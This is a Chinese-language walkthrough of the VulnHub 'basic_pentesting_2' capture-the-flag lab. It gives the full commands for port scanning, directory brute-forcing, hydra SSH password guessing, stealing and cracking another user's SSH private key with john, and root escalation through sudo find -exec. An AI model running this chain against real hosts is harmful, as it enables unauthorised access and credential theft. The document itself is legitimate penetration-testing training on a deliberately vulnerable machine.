一、介紹

運行環境：Virtualbox

攻擊機：kali（10.0.2.4）

靶機：basic_pentesting_2（10.0.2.7）

目標：獲取靶機root權限和flag

靶機下載地址：https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz

二、信息收集

使用nmap主機發現靶機ip：10.0.2.7

使用nmap端口掃描發現靶機開放端口：22、80、139、445、8009、8080

nmap -A 10.0.2.7 -p 1-65535

80端口：打開網站未發現可利用的功能點

使用gobuster工具進行目錄爆破，發現一個目錄/development/

gobuster dir -u http://10.0.2.7/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

訪問發現提示信息

J用戶一直在審核 /etc/shadow 的內容

K用戶的密碼是弱口令

445端口：靶機開放了445端口，可以使用enum4linux工具枚舉smb服務的信息，發現兩個用戶名：kay、jan

enum4linux -a -o 10.0.2.7 

三、漏洞利用

根據之前的提示，使用hydra工具爆破jan用戶的ssh密碼，得到：jan:armando

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.7:22 -t 64 

ssh登錄

四、提權

查看是否存在特權命令，或是否存在具有root權限的可利用的可執行文件，均未發現

翻一翻各個文件夾，發現/home/kay/目錄存在pass.bak文件，但目前我們沒有訪問權限；發現可以訪問kay用戶的ssh私鑰文件

我們可以將私鑰文件的內容復制到本地下來，設置權限：chmod 600 id_rsa

然后嘗試使用私鑰文件登錄目標：ssh -i id_rsa kay@10.0.2.7

通過ssh2john轉換id_rsa為可以識別的信息，然后利用字典解密該信息，來獲取文件密碼。

ssh2john id_rsa > passwd.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

破解成功獲得密碼：beeswax

登錄ssh成功

查看pass.bak文件：heresareallystrongpasswordthatfollowsthepasswordpolicy$$

這個可能是kay用戶的密碼，嘗試使用命令sudo -l查看一下具有sudo權限的程序，輸入密碼成功

可以使用sudo提權，用find的exec參數來執行命令。

sudo find /home -exec /bin/bash \;

獲取flag